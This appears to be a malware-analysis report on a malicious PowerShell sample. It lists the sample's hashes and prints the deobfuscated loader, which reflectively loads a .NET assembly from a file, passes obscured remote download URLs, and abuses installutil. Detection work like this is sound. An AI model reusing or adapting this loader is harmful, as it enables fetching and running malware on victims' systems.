Malicious

01ac0348a623c7f4c3bed2834d528b8b

PowerShell | MD5: 01ac0348a623c7f4c3bed2834d528b8b | Size: 1.68 KB | application/x-powershell

Characteristics
Hash: Hash Value
MD5: 01ac0348a623c7f4c3bed2834d528b8b
Sha1: f7c00dac9182648f683bde97db550af365837dbe
Sha256: a10ef9151e0dd03800f4ccff964a1b8d2583a2d10a82a1b6a537eaf0459f612f
Sha384: 1427a36c5c1f5ce63dd7ed20076294eaa4c889d99d7f1ff7fd3d697c630d39c94921f3e7559757098bc2d3f3ae5facd0
Sha512: 95d0e962fc11810775d4b7d962dcc8908cc8e8063f70f8cdc6d78820ea664c84967df7e73719ba7e922079f6573783c5128dd3f492ef81f64792ee248b2c6d5f
SSDeep: 48:pAlbYyQgQaAAzccJRLRzSkdK4Oggz4J5MLLzQw:pQbYyQgQadzccDFvK4mzjLLkw
TLSH: CA319C506BF69608B2B35E05A5FF65924C3B7A7E6E79CA0D0054C14E1BB1A48CC77F32
File Structure
01ac0348a623c7f4c3bed2834d528b8b: Malicious
[Deobfuscated PS]: Malicious
Artefacts
Name: Deobfuscated PowerShell
Value:

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes"
$zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg="
$zgHoW = ($zgHoW -replace @("緒", "n"))
$cTFzN = "C:\Users\Public\kpfdb.txt"
$djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8")
$djrbd -replace @(" ", "")
[byte[]] $rfljj = [List`1]::"new"()
$rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"()))
$XFTCp = [Assembly]::"Load"($rfljj)
$rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1")
$XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))

Characteristics
No malware configuration was found at this point.